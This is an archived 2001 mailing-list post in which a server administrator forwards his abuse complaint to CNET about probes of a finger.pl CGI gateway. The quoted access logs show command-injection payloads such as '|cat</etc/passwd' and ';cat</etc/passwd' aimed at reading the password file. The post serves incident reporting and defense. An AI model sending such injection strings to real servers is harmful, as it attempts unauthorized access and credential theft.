I sent the following email to several CNET contacts last week regarding atttempts to obtain one of my server's /etc/passwd file. I got no response from CNET, and I am curious to know if anyone else is being probed in this way. --Len. ---------- Forwarded message ---------- Date: Thu, 3 May 2001 12:42:45 -0700 (PDT) From: abuseat_private To: hostmasterat_private, domain-adminat_private Cc: sashapat_private Dear CNET Admins, It appears that a user on your network is attempting to exploit a vulnerability in HTTP-to-finger gateways. I discovered, in the below quoted logs, what looks to be an attempt to get our webserver to execute local commands and print the output to the web page. (Your user searched google.com for the finger.pl script, then attempted to view our passwd file and directory listings, ostensibly so that he could crack legitimate users' passwords and gain shell access to the system.). While this individual was not successful in his attempt on our system, he may be doing this to other systems as well. Please let me know what action you are taking to prevent this from occurring in the future. Also, please preserve all logs, IP assignments, and other data you have pertaining to this incident while it is being investigated. I would appreciate a response today, if possible. Thank you, Len Sassaman 86-241.cnet.com - - [02/May/2001:17:15:11 -0700] "GET /cgi-bin/finger.pl?rabbi HTTP/1.1" 200 37040 "http://www.google.com/search?as_q=&num=10&btnG=Google+Search&as_epq=finger.pl&as_oq=&as_eq=&as_occt=url&lr=&as_dt=i&as_sitesearch=&safe=off" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 86-241.cnet.com - - [02/May/2001:17:15:23 -0700] "GET /cgi-bin/finger.pl? HTTP/1.1" 200 357 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 86-241.cnet.com - - [02/May/2001:17:15:40 -0700] "GET /cgi-bin/finger.pl?|cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 86-241.cnet.com - - [02/May/2001:17:15:47 -0700] "GET /cgi-bin/finger.pl?;cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 86-241.cnet.com - - [02/May/2001:17:15:56 -0700] "GET /cgi-bin/finger.pl?|ls HTTP/1.1" 200 176 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 86-241.cnet.com - - [02/May/2001:17:16:10 -0700] "GET /cgi-bin/finger.pl?user@host HTTP/1.1" 200 140 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
This archive was generated by hypermail 2b30 : Thu May 10 2001 - 17:02:32 PDT